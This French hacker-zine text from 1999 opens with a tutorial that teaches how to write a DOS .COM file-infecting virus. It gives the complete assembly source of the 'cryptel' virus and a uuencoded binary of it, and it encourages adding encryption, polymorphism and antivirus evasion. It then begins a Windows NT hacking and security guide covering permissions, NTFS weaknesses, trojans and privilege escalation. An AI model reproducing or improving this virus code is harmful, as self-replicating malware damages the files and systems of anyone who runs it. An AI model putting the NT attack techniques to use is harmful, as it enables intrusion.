pour la simplicite, on va tenter de trouver des .coms ke dans
notre repertiore courant. lisez l'appendix 'pour aller plus loin' pour faire
des trucs + complike.
voila pour le code:
----8<-------------------
mov ah,1ah
lea bx,dta
int 21h
; le dos nous renverra le nom du fichier dans la DTA, et par defaut, c'est
; dans le PSP, l
ou il y a la ligne de commande. Comme le .com peut en
; avoir besoin, on deplace la DTA pour plus de securit.
lea dx,tofind ; le masque c'est *.com
mov ah,4eh
xor cx,cx
int 21h ; va chercher
jc plus_rien ; flag Carry sur le retour ? aucun trouv :(
call try_inf ; sinon slurp ;) fait ton job
bcl: mov ah,4fh
int 21h ; trouve s'en un autre !
jc plus_rien ; flop ?
call try_inf
jmp bcl ; va cherche le prochain
plus_rien:
;retour programme normal - on a fini :)
try_inf:
mov ah,2fh ; les fonction 4e/4f mettent le file trouv
int 21h ; dans la DTA.. alors on cherche ou elle est
mov dx,bx ; es:bx = pointer vers DTA
add dx,1eh ; et on fait pointer dx sur le nom
call infect ;)~
ret
tofind db '*.com',0
----8<-------------------
bon... ca y est, on a trouver un file a infecter, c kwa la suite ?
une routine d'infection peut se faire comme ca :)~
1) on lit l'ancien debut
2) kke tests; on regarde si le fichier est pas trop gros
si c'est pas un exe camoufle
s'il est pas deja infecter
3) on ecrit le virus a la fin du programme
4) on fabrique un nouvo debut ki redirige vers nous
5) on ecrit ce nouvo debut
voici un example de code ki fait ca:
----8<-------------------
infect:
mov ax,3d02h
; ds:dx = seg:offset du file
int 21h ; on ouvre le fichier en mode r/w
xchg ax,bx ; + court ke 'mov bx,ax' ; optimisation !
mov ah,3fh
lea dx,oldbeg
mov cx,4
int 21h ; on lit le vrai debut pour plus tard
cmp word ptr [oldbeg],'MZ' ; certains .com sont des EXE en fait
je fin ; comme command.com ou edit.com
cmp word ptr [oldbeg],'ZM' ; ne les trashont pas !
je fin ; ils ont 'ZM' ou 'MZ' au tt debut.
cmp byte ptr [oldbeg+3],'' ; deja infecter ?
je fin
mov ax,4202h
xor cx,cx ; = mov cx,0 (+ court)
cwd ; = xor dx,dx (+ court)
int 21h ; va a la fin du fichier
mov dx,ax ; on en profite pour avoir la taille
mov [pointer],dx ; on s'en servira plus tard :)
mov cx,virsiz ; dans ax par retour, et on test si <Ä.
add dx,cx ; prog+virus > 64ko |
jc no_infect ; si c'est le cas -> bye |
mov ah,40h |
; mov cx,virsiz pas besoin, car deja vrai Äù'
lea dx,virus
int 21h ; ecris le virus a la fin du .com
mov ax,4200h
xor cx,cx
cwd
int 21h ; reviens au debut du fichier
; maintenant, nous allons ecrire le nouvo debut.
; ce sera les 3 bytes situs
[newbeg] ki correspondent a l'instruction
; e9 xx xx : jmp far xxxx - ici fin du fichier, donc xxxx=taille du fichier
; -3 a cause de la premiere instruction
sub word ptr [pointer],3
; le '' a la suite ne sera pas execut, c'est juste un 'marker'
mov ah,40h
mov cx,4
lea dx,newbeg
int 21h
fin: mov ah,3eh
int 21h
ret
oldbeg db 0,0,0
newbeg db 0e9h
pointer db 0,0
infmark db '' ; markeur d'infection (exemple)
----8<-------------------
ok... voila pour une infection simple mais efficace..
maintenant, on va etudier le debut du virus.
c'est po super ortodox comme tutorial, mais on a compris comment on arrive la
donc le prog s'exec, et le jmp envoie sur le debut du virus coll a la fin.
le probleme c'est k'on peut pas savoir a kel offset on est, car ca depends
de la taille du fichier, et un 'mov dx,offset tofind' ne marche plus, car
'tofind' n'est plus au m^me endroit en memoire.
une solution consiste a connaitre l'offset ou l'on est et
l'utiliser
pour calculer les pointeurs vers les donnes comme 'tofind'
une solution est:
call delta
delta: pop bp
sub bp,offset delta
xplikation:
'call delta' mets l'offset de la commande d'apres sur la pile,
on la recupere dans bp, et on calcule la difference entre l'offset actuel
et celui initial dans le virus 1ere generation.
Dans le code, au lieu d'un 'mov dx,offset tofind' vous devrez utiliser
'lea dx,bp+offset tofind' et vous serez sur ke ca marchera
Ce serait mieux ke vous compreniez, mais c'est po 100% necessaire.
il faudra donc reecrire les routines plus haut en tenant compte de ca.
il ne nous reste plus ke le retour au vrai programme a etudier.
il fo remettre le vrai debut en memoire a l'offset 100h, et jumper l
.
proposition de code:
----8<-------------------
mov si,100h
mov ax,word ptr [bp+oldbeg]
mov [si],ax
mov ax,word ptr [bp+oldbeg+2]
mov [si],ax
jmp si
----8<-------------------
et l
la boucle est boucle.
aller plus loin:
~~~~~~~~~~~~~~~~
- L
comme virus, on peut pas faire plus standard, donc les AVs vous
capteront
coup sr. (tin j'fais d efforts pour les accents)
Vous pouvez utiliser des variantes dans chaque routine, ou rajouter de
l'encryption ou du polymorphisme, avec de l'anti debug et de l'anti emul,
mais ces sujets depassent ce tutorial ki doit rester pas trop gros :P
- Vous aurez des suprisent, comme les .com ki s'inspectent avant d'executer
ce dont ils ont etes fait pour. comme keyb.com ou win.com sous win9x.
L
encore, c'est possible de feinter mais ca sort du tutorial.
- Au lieu d'un runtime infector, vous pouvez coder un joli TSR
(residant memoire) bien plus efficace, et avec plein d'autre possibilits.
- Plus simplement, vous pouvez ameliorer votre runtime en remontant les reps
par la methode 'dotdot', ou en infectant les reps connus genre
\windows\command. Vous pouvez aussi rajouter des fonctions comme
enlever/remettre les attributs, la date du fichier, etc etc....
- Plus tard, vous pourrez rajouter des chtites fonctions pour ne pas se faire
reperrer par les moniteurs en memoire comme tbmem/tbfile, ou pour rendre
difficile le travail des AVs, m^me qd ils ont une copie du vir.
- Je vous conseille aussi fortement d'optimiser: faire un virus le plus petit
possible... pour cela utiliser des instructions et les registres 32bits .
profitons de l'assembleur ! les virus sont un tres bon moyen d'apprendre !
A la fin, qd tout marche bien, vous pouvez inclure une 'payload' ;
le truc drole, special, ki s'active selon les criteres de votre choix.
Soyez original, ne faites pas de trucs stupides ki gacherait tt le travail
genre payload destructrice (ki d'ailleurs diminue les chances de se repandre)
L
vous etes libre.
Je rajouterai qu'il ne faut pas lacher un virus dans la nature, a moins
d'etre sur a 100% k'il marche. Je dirais m^me plus, ne lachez jamais vos
premiers viriis, vous verez plus tard k'il etait pas tres safe.
On peux pas tout savoir du 1er coup.
Comme vous le constatez, nous n'avons juste k'effleurer l'iceberg.
Si vous voulez plus, mailez le mag en disans 'on aime mandragore !',
'on veux plus d'article de lui!' :))
ùÄÄ mandragore ÄÄ---ùù
voici le resultat:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-8<ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-8<ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.model tiny
.code
org 100h
Start:
jmp virus ; notre nouvo debut (ici bricol)
db 90h ; pour faire 4 bytes
db '' ; deja infect
mov ah,9
lea dx,mess
int 21h
int 20h
mess db 'this file is infected by the cryptel virus!',13,10,'$'
virus: call delta
delta: pop bp
sub bp,offset delta
mov si,100h
mov ax,word ptr [bp+oldbeg]
mov [si],ax ; on remets le vrai debut tt de suite
mov ax,word ptr [bp+oldbeg+2] ; car il sera ecras plus tard
mov [si+2],ax
mov ah,1ah
lea bx,bp+dta
int 21h
mov ah,4eh
xor cx,cx
lea dx,bp+tofind
int 21h ; on cherche
jc plus_rien
call try_inf
bcl: mov ah,4fh
int 21h ; on continue
jc plus_rien
call try_inf
jmp bcl
plus_rien:
mov si,100h
jmp si ; retourne au vrai programme
try_inf:
mov ah,2fh
int 21h ; on recup le nom ds la DTA
mov dx,bx
add dx,1eh
call infect ;)~
ret
infect:
mov ax,3d02h
int 21h ; ouverture r/w
xchg ax,bx
mov ah,3fh
lea dx,bp+oldbeg
mov cx,4
int 21h ; on lit le debut
cmp word ptr [bp+oldbeg],'MZ'
je fin
cmp word ptr [bp+oldbeg],'ZM' ; exe ?
je fin
cmp byte ptr [bp+oldbeg+3],'' ; deja infected ?
je fin
mov ax,4202h
xor cx,cx
cwd
int 21h ; vas a fin du fichier ....
mov dx,ax
mov word ptr [bp+pointer],dx
mov cx,virsiz
add dx,cx
jc fin
mov ah,40h
lea dx,bp+virus
int 21h ; .... pour ecrire le virus
mov ax,4200h
xor cx,cx
cwd
int 21h ; reviens au debut ....
sub word ptr [bp+pointer],3
mov ah,40h
mov cx,4
lea dx,bp+newbeg
int 21h ; .... pour mettre le nouvo debut
fin: mov ah,3eh
int 21h
ret
;--- zone des donnes ( regroups pour plus de clart.. )
tofind db '*.com',0
oldbeg db 90h,90h,90h,90h ; notre debut (nop nop nop)
newbeg db 0e9h
pointer db 0,0
infmark db '' ; markeur d'infection
db '[cryptel] by mandragore/DDT (feb 99)',13,10 ; (c) ;)
db 'greetz to all french virii coders!'
virsiz = $-virus ; taille du virus = ici - debut virus
dta:
end start
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-8<ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-8<ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin 644 cryptel.com
MZSF0`[0)N@T!S2'-('1H:7,@9FEL92!I<R!I;F9E8W1E9"!B>2!T:&4@8W)Y
M<'1E;"!V:7)U<R$-"B3H``!=@>T^`;X``8N&[P&)!(N&\0&)1`*T&HV>/P+-
M(;1.,\F-END!S2%R#N@0`+1/S2%R!>@'`.OUO@`!_^:T+\TAB].#PA[H`0##
MN`(]S2&3M#^-EN\!N00`S2&!ON\!6DUT1(&^[P%-6G0\@+[R`0-T-;@"0C/)
MF<TAB]")EO0!N00!`]%R(+1`C98[`<TAN`!",\F9S2&#KO0!`[1`N00`C9;S
M`<TAM#[-(<,J+F-O;0"0D)"0Z0```UMC<GEP=&5L72!B>2!M86YD<F%G;W)E
M+T1$5"`H9F5B(#DY*0T*9W)E971Z('1O(&%L;"!F<F5N8V@@=FER:6D@8V]D
$97)S(0``
`
end
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) WINDOWS NT ) 4.12 ( Shen-lun / Cyberjunk (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
[ Ultime Guide de Hacking & Sécurité ]
Version 07/05/99 (b)
Shen-lun / shen_lun@hotmail.com
Cyberjunk / snipper@hotmail.com
Avril/Mai 1999
MHT Crew ~ phear.ctw.cc
Cryptel ~ cryptel.cjb.net
+--------------------------------+
| 1St PART: Mise dans le bain ;-)|
| Level: include <coffee.h> |
+--------------------------------+
Disclaimer
Introduction Générale
Introduction à Windows NT
+--------------------------------+
| 2nd PART: Théorie HARD |
| Level: include <upsa.h> |
+--------------------------------+
Les Shares (Notion de Partage)
Les vulnérabilités NTFS
Le Modèle de sécurité de Windows NT
SAM (Authentification des Users par le service SAM)
Groupes et Permissions
Groupes de Domaines par défaut
Groupes Locaux par défaut
Répertoires et Permissions par défaut
Administrateurs et Equivalents
Identité( ID, Sécurité et Administration )
Groupe des Administrateurs
Passwords (localisation et enregistrement)
Comment "Hacker" des Passwords
Brute force Attaque
Attaque par Dictionnaire
Utilisation de LophtCrack
LockOut Sécurité
Accompte Administrateur sans Password
Accompte Administrateur
Accompte Guest sans Password
TCP/IP et HTTP
Protocoles de Sécurité
Services SMB (Secure Message Block)
SAMBA
Utilisation de SAMBA vers NT
Vulnérabilités NT
Services d'Alerte NT
NetBIOS
Sécurité LAN Manager
NTNM (NT Network Monitor)
Service RSH
Service SCHEDULE
Registre NT
Système NT et Virus
Sécurité des Serveurs FTP
Utilitaire Rollback.exe
Securité du service RAS ( Remote Access Services)
Logs et Audits
+--------------------------------+
| 3rd PART: Travaux Pratiques |
| Level: include <disclaimer.h> |
+--------------------------------+
Attaques possibles contre un serveur NT
Denial of Service
Vulnérabilité aux attaques TCP
Internet Information Services (IIS)
Active Server Pages (ASP)
Rappel sur NetBios / NetBeui via TCP/IP
Inter-Process Communication (IPC$)
Windows NT Security Identifiers (SID)
Attaque utilisant les SID2USER.EXE et USER2SID.EXE
Hack de NT en local
DLL Mapping exploit
Sniffer de réseaux
Utilisation de BUTTSniff.exe
+--------------------------------+
| 4th PART: Conclusion |
| Level: include <blablabla.h> |
+--------------------------------+
Conclusion
Sources
URL's
Remerciements
<------------------Conçu pour une résolution ---------------------------------------------------->
+--------------------------------+
| 1St PART: Mise dans le bain ;-)|
| Level: include <coffee.h> |
+--------------------------------+
Disclaimer:
-=-=-=-=-=-=-
L'auteur n'assume de responsabilités, ni pour l'utilisation des
informations et programmes se trouvant cités dans ce document ,
ni pour leur utilisation, ni pour les contrefaçons de brevets ou
atteintes aux droits de tierces personnes qui pourraient résulter
de cette utilisation. Les exemples ou les programmes présentés dans
ce document sont fournis pour illustrer les descriptions théoriques.
Ils ne sont en aucun cas destinés à une utilisation commerciale
ou professionnelle.
Les auteurs ne pourront en aucun cas être tenu pour responsable des
préjudices ou dommages de quelque nature que ce soit pouvant résulter
de l'utilisation de ces exemples ou programmes.
Tous les noms de produits ou autres marques cités dans ce document
sont des marques déposées par leur propriétaire respectif.
Introduction Générale:
-=-=-=-=-=-=-=-=-=-=-=-
Parceque la popularité de Windows NT augmente de jour en jour, ainsi
que le nombre de serveur de ce genre sur internet j'ai décidé avec
l'aide de certaines personnes plus qualifiés que moi, et une bonne dose
de documentation sur NT d'écrire ce "guide".Le but de ce texte est laissé
à l'appréciation du lecteur (selon le coté auquel il appartient) pour
ma part je considére qu'il a un but strictement informatif, je n'ai
aucunement la prétention de dire que c'est une référence pour un
administrateur ou un pirate, malgrés tout ils pourront y trouver
des informations interressantes...
* vous étes le seul juge *
Je vous encourage donc à envoyer vos critiques et vos encouragements
(Faut pas réver mais bon ...) à shen_lun@hotmail.com.
Sur ces derniers mots, bonne lecture...
have fun!
Shen-Lun
Je dédicasse ce texte a tous ce ki veule s'instruire. Toutes remarques,
corrections, info supp (?) sont les bienvenue. Servez vous des mails ;-)
D'autre part il est basé sur le dicton :
* No pretention, just information *
So ... Let's Go now ?! =)
-junk-
Introduction à Windows NT:
-=-=-=--=-=-=-=-=-=-=-=-=-
Ce qu'il faut savoir à propos de NT:
* Windows NT utilise un modéle de securité basé objet ce qui signifie
que Windows NT vous permet de securiser chaque fichier stocké sur le serveur.
* Le modèle de sécurité de Windows NT se caractérise par quatre composés:
Le LSA (Local Security Authority),le SAM(Security Account Manager),
le SRM (Security Reference Monitor) et le UI (User Interface).
* Windows NT utilise le protocole SMB (Server Message Block) pour gérer
les transmissions.
* Windows NT possède un pointeur d'interface de sécurité qui lui permet
de supporter de nombreuses interfaces de sécurité.
* Un réseau sécurisé nécessite, en plus d'autres choses, un serveur sécurisé
"physiquement".
* Windows NT (New Technology ou Neanderthal Technology ?! =) est un serveur OS de
Microsoft.
Chez Microsoft on désigne Windows NT comme produit idéal en réponse à la demande
grandissante du marché des serveurs. Avec NT, Microsoft cible les réseaux sous
Windows 3.1, Windows 95, Windows 98 mais aussi NetWare et Unix.
* Windows 3.1 utilise comme base le MS-DOS FAT 16-bits (File Allocation Table),
Windows 9X utilise lui le syteme de FAT 32b-bits pour répertorier ou résident
les fichiers sur le disque dur, Windows NT répertorie les fichiers grace au NTFS
(NT file system).Le NTFS est lié a la sécurité NT c'est le noyau que NT utilise
pour controler les niveaux d'acces des informations sur le serveur.
NTFS et le modéle de sécurité de Windows NT permettent à l'administrateur du systéme
de gérer les accés aux ressources de façon trés stricte.
* Ce qui va suivre suppose que votre serveur Windows NT utilise NTFS comme OS de base.
Il est important si NTFS est l'OS de de votre serveur NT;si ce n' est pas le cas vous
devrez re-installer Windows NT avec NTFS comme OS. Pour déterminer quel OS utilise
votre serveur NT utilise, suivez les étapes suivantes:
1- Selectionnez le menu démarrer, programmes, option Windows NT Explorer du serveur.
Windows NT vas lancer L'Eplorer de Windows NT.
2- Un click sur le bouton droit de la souris sur le disque dur de boot
(c'est à dire le disque dur sur lequel NT démarre) dans l'Explorer NT afficheras
un menu).
3- Selectionner les propriétés sur le menu.Cela afficheras la boite de
dialogue des propriétés.
4- L'OS est indiqué dans a la section File system, si ce n'est pas NTFS
(c a d
MS-DOS ou OS/2) vous devez re-installer votre serveur Windows NT.
rem: Juste pour information, NTFS n'est pas totalement une inovation car
il s'agit en fait du HPFS (OS/2) à la sauce kro$oft.
+--------------------------------+
| 2nd PART: Théorie HARD |
| Level: include <upsa.h> |
+--------------------------------+
Les Shares (ressources partagées):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Les "Shares" sous Windows NT sont les fichiers ou repertoires qui sont
en accés partagés sur le serveur.Lorsque vous installez Windows NT cela
crée certains partages par défaut sur le serveur, la plupart sont invisbles
pour tous les utilisateurs sauf pour celles gérant l'administration.
Les partages d'administration sont des accomptes permanent par défaut qui
ont un $ à la fin de leur nom. WINNT$ est le repertoire root du système de
fichiers.
Les Vulnérabilités de NTFS:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
En fait NTFS n'as pas réellement de vulnérabilité par lui même mais il
posséde une petite faiblesse que les hackers peuvent exploiter à différents
degrés.Il ya trois légeres insuffisances dans NTFS:
1- Si vous créez un repertoire pour un user, cet user a la possibilité de
controler les permissions d'accés à ce répertoire ou fichier. Par exemple,
si vous créez un répertoire pour l'user Newbie, l'user Newbie peut utiliser
les outils d'administration système pour permettre l'accés à ce répertoire
à tous ceux qui ont accés au serveur, car Newbie est le propriétaire de ce
répertoire.Ce n'est pas particulierement dangereux en soi-même, mais si un
hacker s'introduisant dans le serveur se loggue avec cet user qui à des droits
d'accés étendus, l'intruder peut partager les répertoires de cet user avec tout
le monde "everyone" (laissant ainsi un seul enregistrement de vérification),
ensuite il se déloggue du serveur et se reloggue dans son accompte, mais il
garde l'accés à son nouveau répertoire partagé.
2- Si un hacker posséde un accés physique au serveur NT, il peut rebooter le
serveur avec une disquette MS-DOS et utiliser un utilitaire appellé ntfsdos.exe
pour accéder au disque dur du serveur.Le hacker peut ensuite avoir accés au disque
dur entier sans se soucier des permissions de sécurité. Il en va de même pour un
système en multiboot, NT avec Linux par exemple.
3- Si vous donnez à un user le controle total de son répertoire au lieu de
read, write, delete et create permissions, l'user reçoit une permission cachée
nommée File Delete Child.Si vous accordez a l'user le controle total, vous ne
pourrez plus enlever cette permission cachée.La permission File Delete Child permet
à n'importe quel user d'éffacer n'importe quel fichier en lecture seule du répertoire.
Selon ce que contient le répertoire, l'user peut éffacer des fichiers importants ce
qui peut étre trés dangereux pour votre installation de NT.
Le Modèle de sécurité de Windows NT:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Avant de travailler avec Windows NT, même si l'on en connait les bases, il est
préférable d'avoir compris les bases du modèle de sécurité de Windows NT.
Cette section décrit les bases et introduit des termes nécessaires à la compréhension
de la suite du texte.
Lorsque Micrososft a décidé de créer un seveur OS , ils avaient en téte que leur
système atteigne au minimum la classe C2 (décrite dans le "Department of Defense
's Orange Book System"). Une classe de sécurité C2 se caractérise par différent
facteurs à dans le modéle de sécurité de l'OS.
Bien que le serveur Windows NT ai reçu la certification C2 (pour sa version 3.51),
c'est seulement une certification pour une machine seule, sans lecteur de disquette
et sans connections à un réseau. Néanmoins, Microsoft a dévellopé un modèle de sécurité
pour Windows NT qui, par le fait de sa nature extensible, assure un environement pour
un serveur commercial assez sécurisé. En effet le modéle de sécurité de Windows NT est
extensible, ce qui signifie que des programmes peuvent facilement étendre les capacités
du modèle en incluant de nouvelles fonctions de sécurité.
Cela se caractérise par des améliorations du systéme de sécurité a travers les
versions de Windows NT:
Le modèle de sécurité de NT 4.0 n'intègre pas de support Kerebos,à la différence du
modéle NT5.
Chaque objet de Windows NT posséde ses propres attributs de sécurité qui gérent l'accés
d'un user à cet objet. Ces attributs sont appelés security descriptor,qui ont deux
composants:
* Une liste de controle des accés (Access-Control List) et des informations sur
l'objet lui même.
* L'Access-Control List (ACL)contient des informationsqui spécifient quels users et
quels groupes ont accés a l'objet, et quel niveau d'accés ont ces users et ces groupes.
Ces groupes sont des users associés par fonction ou groupes sociaux, ou selon le
département technique auxquels ils appartiennent (Ex: MANAGERS, PUB, etc).
Windows NTinstalle de nombreux goupes par défaut: Everyone, Power, Users et Administrators.
Il est important de noter que Windows NT supporte des niveaux d'accés ou types pour
chaque groupes.Par exemple le groupe Everyone pourrait avoir un accés en lecture seule
pour un objet, et les groupes Power et Users pourraient avoir les accés en lecture,
écriture, copie, suppréssion pour un objet.L'OS permet un controle spécifique sur qui
peux accéder a quel objet et comment une personne peut acceder a cet objet.
Windows NT divise l'ACL en deux composants, le Discretionary ACL et le System ACL,
qui décrivent deux différent type de restriction pour chaque objet.Le DACL controle
quels users ont accés a un objet, alors que le SACL controle quels objets systéme
et quels services ont accés à un objet.Le DACL est la liste que vous modifierez le
plus souvent (avec les accés) car l'OS maintient toutes les informations dans le SACL.
Le DACL quand a lui contient une entrée pour chaque user ou groupe enregistré dans
le systéme.L'OS reconnait ces entrées dans le DACL comme Access-Control Entries (ACE).
L'ACE contient la notation actuelle sur les niveaux d'accés d'un user ou groupe pour
un objet.
Lorsque un user ou un service de Windows NT crée un objet, l'OS Windows NT crée
toujours le security descriptor pour l'objet.Si l'user ou le service ne lie pas
ses propres attributs de sécurité a ce fichier,Windows NT crée le DACL dans le
security descriptor sans ACE.En fait Windows NT n'assigne aucune permission spécifique
a cet objet.
Comme le requiert la classe de sécurité C2, l'OS Windows NT est construit de façon a
ce que " ce qui n'est pas explicitement permis, est interdit".Aussi, parceque Windows
NT crée l'objet sans permissions explicite, personne ne peut avoir accés a l'objet.
Malgrés ça aprés l'ajout de permissions spécifiques par le systéme à cet objet, seul
les users ou groupes nommés dans le DACL auront la permission d'accés à l'objet.
Composants du modéle de sécurité de Windows NT :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* Local Security Authority (LSA)
Le LSA est aussi connu sous le nom de Security Subsystem.
C'est le composant principal de la sécurité NT.Il gére la sécurité locale et
l'authentification des users . Le LSA gére aussi la génération et le log des messages
de vérification.
* Sécurity Account Manager (SAM)
Le SAM gére les accomptes des users et des groupes,et les services d'authentification
des users pour le LSA.
* Security Reference Monitor (SRM)
Le SRM assure la validité et la vérification des accés pour le LSA.Il controle les
accomptes des users et les essais des users pour acceder a divers fichiers ou repertoires
et ainsi permet ou non a l'user d'acceder au fichier.Le SRM génére des messages de
vérification en fonction de la permission accordée ou non.Le SRM contient une copie du
code de validation des accés pour assurer que le SRM protége les ressources uniformément
dans tout le systéme,sans ce soucier du type de ressource.
* User Interface (UI)
Une partie importante du modéle de sécurité, l'UI est ce que l'user utilise couramment
pour les taches administratives.
En clair, le LSA gére la pluspart des taches de management du systéme de sécurité.
Le LSA appelle le SAM et le SRM quand il a besoin de leurs services et ensuite renvoie
les résultats a l'administrateur ou l'user a travers l'interface UI.
Interéactions entre les quatres composants du modéle de sécurité:
La structure essentielle des permissions NT signifie que pour chaque objet sur le
réseaux NT, chaque user ou groupe doit avoir une permission spécifique pour avoir
accés a l'objet avant que l'OS laisse l'user ou le groupe accéder a l'objet.
SAM (Authentification des Users par le service SAM)
Le SAM génére les services d'authentification des users pour le LSA.Lorsque l'on veux
sécuriser un réseaux NT il est important de comprendre comment le SAM authentifie les users.
D'abord le user essaiye de se logguer sur le systéme.Si Windows NT reconnait le
login et le password de l'accompte de l'user, NT permet alors a l'user de se logguer
sur le systéme et NT crée alors un objet virtuel (Token /Jeton) qui représente
l'user sur l'OS.
L'OS associeras chaque processus que lance l'user avec le Token (ou une copie du Token)
que l'OS crée lorsque l'user se loggue sur le réseaux.Windows NT fait réference a
la combinaison token-processus comme un sujet.Par exemple, lorsqu'un user lance
un programme, l'OS crée un sujet qui contient le processus du programme ( thread )
et le token de l'user.
NT vérifie le token du sujet avec l'ACL de l'objet et détermine si oui ou non il
doit laisser le sujet accéder a l'objet.En fonction de la configuration de votre
serveur, chaque accés, qu'il soit accepté ou refusé, génére un message de vérification.
L'OS lit le sujet du token avant de donner l'acces a l'objet.
Groupes et Permissions:
-=-=-=-=-=-=-=-=-=-=-=-
Windows NT base son modéle de sécurité autour des users, groupes et permissions
de sécurité accordées à ces users et goupes.Vous pourrez créer des users et groupes
à l'aide du programme User Manager for Domains ( usrmgr.exe sous Workstations et
musrmgr.exe sous NT server ).
Groupes de Domaines par défaut:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Lorsque vouz installez le serveur Windows NT, l'OS crée automatiquement six groupes
par défaut:Administrator, Backup Operators, Guests, Power Users,
Replicators, et Users.
Les six groupes correspondent aux droits d'accés de base que vous devrez utiliser
dans votre réseaux NT.Le groupe Administrator a un accés total a chaque repertoire
et fichier a travers le systéme de fichier du domaine.Les users administrateurs
(s'occupant aussi de la gestion du systéme et nécessitant des droits d'accés étendus)
ayant besoin des droits Administrator doivent avoir les droits Administrator
et Power Users.
Groupes de domaines sur un serveur NT:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>Administrators: Les Administrateurs ont un droit d'accés total sur chaque
fichier et repertoiresur le serveur dans le domaine.
>Backup Operators: Les Backup Operators peuvent outrepasser les controles
des fichiers de sécurité comme la plupart des opérations de sauvegarde.
Ces droits peuvent poser des problémes de sécurité car un hacker peut faire
un back-up du réseau et accéder aux fichiers une fois off line.
>Guests: Les accomptes Guest sous Windows NT peuvent se logguer dans le domaine
et voir la plupart des fichier a l'interieur du domaine mais ne peuvent pas
ouvrir ou accéder a ces fichiers.
>Power Users: Les Power Users ont tous les droits des users.En plus ils peuvent
partager des répertoires et imprimantes avec d'autres Power Users et possédent
des droits étendus pour les bases de donnée.
>Replicators: Les users du groupe Replicators peuvent copier des fichiers dans
un domaine, d'un endroit à un autre, mais ne peuvent pas ouvrir ou modifier ces
fichiers copiés sans des droits d'accés supplémentaires.
>Users: Les Users ont généralement accés a leur repertoire home, aux applications,
et aux fichiers partagés pour lesquels ils ont les bons droits.
Groupes Locaux par défaut:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Windows NT crée par défaut un certain nombre de groupes locaux qui peuvent avoir
plusieurs fonctions.
>Server Operators: Les utilisateurs membres du groupe Server Operators peuvent
rebooter le serveur, même a distance, ils peuvent remettre a zero le system time
du serveur, et faire des sauvegardes et des restaurations.
>Backup Operators: Les utilisateurs membres du groupe Backup Operators peuvent
rebooter le serveur, faire des sauvegardes et restaurations.
>Account Operators: Les utilisateurs membres du groupe Account Operators peuvent
rebooter le serveur.
>Print Operators: Les utilisateurs membres du groupe Print Operators peuvent
rebooter le serveur.
Aussi, les membres de ces groupes peuvent se logguer sur la console.Vous devez
securiser et régir les priviléges d'accés des accomptes locaux cités ci-dessus,car si
un hacker obtient un accompte de Server Operator, il peut placer un trojan (comme netbus
ou back orifice...) sur le serveur et ensuite rebooter la machine a distance, pour pouvoir
utiliser ensuite le trojan pour obtenir des priviléges d'administrateurs.
Répertoires et Permissions par défaut:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Lorsque vous installez Windows NT, il crée certaines permissions de répertoires par
défaut pour chaque groupe crée par défaut.Les Administrateurs ont accés a tous les fichiers
dans le serveur ou domaine, les autres groupes ont les permissions par défaut suivantes:
>winnt, \system32, \win32app: Server Operators et Users peuvent lire et exécuter des
fichiers, afficher les permissions sur les fichiers et changer quelques attributs de fichier.
>\system32\config: Tous les Users peuvent lister les noms des fichiers dans ce répertoire.
>\system32\drivers, \system\repl: Server Operators ont tous les droits (lire, executer,
ecrire, supprimer et créer) les Users ont un accés en lecture seule.
>\system32\spool: Server Operators et Print Operators ont tous les droits.Tous les Users
ont un accés en lecture seule.
>\system32\repl\export: Server Operator peuvent lire et exécuter les fichiers, afficher
les permissions sur les fichiers, et changer quelques attributs de fichier. Replicator ont
un accés en lecture seule.
>\system32\repl\import: Server Operators et Replicator peuvent lire et exécuter des fichiers,
afficher les permissions sur les fichiers, et changer quelques attributs de fichier.
Users ont un accés en lecture seule.
>\users: Account Operators peuvent lire, écrire, supprimer, et exécuter des fichiers.
Users peuvent lister les noms des fichiers de ce répertoire.
>\users\default: Tous les Users peuvent lire , écrire, et exécuter les fichiers.
Lorsque vous créez des permissions pour les groupes dans votre installation, vous
devez modifier les accés des groupes aux répertoires ci dessus.
Administrateurs et Equivalents:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Les utilisateurs dans le groupe Administrators ont accés a toutes les ressources
sur le systeme même si ils n'ont pas de permissions d'accés spécifiques pour un
répertoire spécifique.Ensuite , vous devez restrindre le niveau d'accés Administrators
aux utilisateurs appropriés et laisser ce niveau d'accés fermé pour les utilisateurs
non authorisés.La structure des permissions de fichiers de Windows NT vous permet
d'utiliser le Windows NT Audit Tool pour gérer l'utilisation du niveau d'ID Administrator.
Vous pouvez aussi assigner une seconde ID user avec une appartenace au groupe
Administrators, pour les utilisateurs qui doivent avoir un niveau d'accés élevé.
En créant une seconde ID user vous pourrez surveiller les accés et les logins que
les users utilisent avec le niveau d'ID Administrator.
Identité( ID, Sécurité et Administration ):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Il arrive de vouloir créer des users spéciaux , qui peuvent avoir des droits d'accés
d'users sans avoir accés au réseaux complet.Au lieu d'assigner une ID Administrator
vous pouvez assigner un groupe Account Operators.L'administarteur peut ainsi s'assurer
que l' Account Operators a tous les dtoits dans la partie du reseaux le concernant.
Si vous créez différent Account Operators dans chaque département cela réduira le travail
d'administration du réseaux.De plus chaque Account Operator est responsable de tous les
accés dans son dépatement d'Account Operator.Cela permet de mieux repérer lorsque des
accés sont donnés a des mauvais fichiers ou repertoires, et quel est l'Acount Operator
